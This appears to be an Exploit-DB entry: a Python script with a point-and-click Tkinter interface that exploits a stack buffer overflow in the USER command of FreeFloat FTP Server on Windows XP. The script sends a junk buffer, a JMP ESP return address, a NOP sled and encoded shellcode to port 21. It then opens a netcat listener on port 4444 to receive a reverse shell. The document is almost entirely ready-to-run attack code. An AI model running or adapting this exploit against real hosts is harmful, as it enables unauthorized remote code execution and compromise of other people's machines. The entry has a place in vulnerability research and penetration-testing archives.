Freefloat FTP Server - 'USER' Remote Buffer Overflow

EDB-ID:

23243

CVE:


EDB Verified:

Author:

D35m0nd142

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2012-12-09

Vulnerable App: 
#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
#Date: 06/12/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.freefoat.com
#Tested on Windows XP SP3 with Ubuntu 12.04
#!/usr/bin/python
import socket,sys,time,os
import Tkinter,tkMessageBox
os.system("clear")
def exploit():
	target = ip.get()
	junk = "\x41" * 230     # Offest Number --> 230
	eip = "\x53\x93\x37\x7E"  # 0x7E379353   FFE4             JMP ESP
	nops = "\x90" * 20
	payload =("\xb8\xe9\x78\x9d\xdb\xda\xd2\xd9\x74\x24\xf4\x5e\x2b\xc9" +
	"\xb1\x4f\x31\x46\x14\x83\xc6\x04\x03\x46\x10\x0b\x8d\x61" +
	"\x33\x42\x6e\x9a\xc4\x34\xe6\x7f\xf5\x66\x9c\xf4\xa4\xb6" +
	"\xd6\x59\x45\x3d\xba\x49\xde\x33\x13\x7d\x57\xf9\x45\xb0" +
	"\x68\xcc\x49\x1e\xaa\x4f\x36\x5d\xff\xaf\x07\xae\xf2\xae" +	
	"\x40\xd3\xfd\xe2\x19\x9f\xac\x12\x2d\xdd\x6c\x13\xe1\x69" +
	"\xcc\x6b\x84\xae\xb9\xc1\x87\xfe\x12\x5e\xcf\xe6\x19\x38" +
	"\xf0\x17\xcd\x5b\xcc\x5e\x7a\xaf\xa6\x60\xaa\xfe\x47\x53" +
	"\x92\xac\x79\x5b\x1f\xad\xbe\x5c\xc0\xd8\xb4\x9e\x7d\xda" +
	"\x0e\xdc\x59\x6f\x93\x46\x29\xd7\x77\x76\xfe\x81\xfc\x74" +	
	"\x4b\xc6\x5b\x99\x4a\x0b\xd0\xa5\xc7\xaa\x37\x2c\x93\x88" +
	"\x93\x74\x47\xb1\x82\xd0\x26\xce\xd5\xbd\x97\x6a\x9d\x2c" +
	"\xc3\x0c\xfc\x38\x20\x22\xff\xb8\x2e\x35\x8c\x8a\xf1\xed" +
	"\x1a\xa7\x7a\x2b\xdc\xc8\x50\x8b\x72\x37\x5b\xeb\x5b\xfc" +
	"\x0f\xbb\xf3\xd5\x2f\x50\x04\xd9\xe5\xf6\x54\x75\x56\xb6" +	
	"\x04\x35\x06\x5e\x4f\xba\x79\x7e\x70\x10\x0c\xb9\xe7\x5b" +
	"\xa7\x44\x78\x33\xba\x46\x69\x98\x33\xa0\xe3\x30\x12\x7b" +
	"\x9c\xa9\x3f\xf7\x3d\x35\xea\x9f\xde\xa4\x71\x5f\xa8\xd4" +
	"\x2d\x08\xfd\x2b\x24\xdc\x13\x15\x9e\xc2\xe9\xc3\xd9\x46" +
	"\x36\x30\xe7\x47\xbb\x0c\xc3\x57\x05\x8c\x4f\x03\xd9\xdb" +
	"\x19\xfd\x9f\xb5\xeb\x57\x76\x69\xa2\x3f\x0f\x41\x75\x39" +
	"\x10\x8c\x03\xa5\xa1\x79\x52\xda\x0e\xee\x52\xa3\x72\x8e" +
	"\x9d\x7e\x37\xbe\xd7\x22\x1e\x57\xbe\xb7\x22\x3a\x41\x62" +
	"\x60\x43\xc2\x86\x19\xb0\xda\xe3\x1c\xfc\x5c\x18\x6d\x6d" +
	"\x09\x1e\xc2\x8e\x18")
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

	try:
		sock.connect((target,21))
		print "\n\n[-] Sending exploit ..."
		print sock.recv(2000)
		sock.send("USER "+junk+eip+nops+payload+"\r\n")
		sock.close()
		os.system("nc -lvp 4444")
	except:
		print "[-] Connection to "+target+" failed! \n"
		sys.exit(0)


root=Tkinter.Tk()
root.geometry("%dx%d" %(700,375))
root.title("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow***")
root['bg'] = 'black'
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_answer=Tkinter.Label(text="IP Address ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services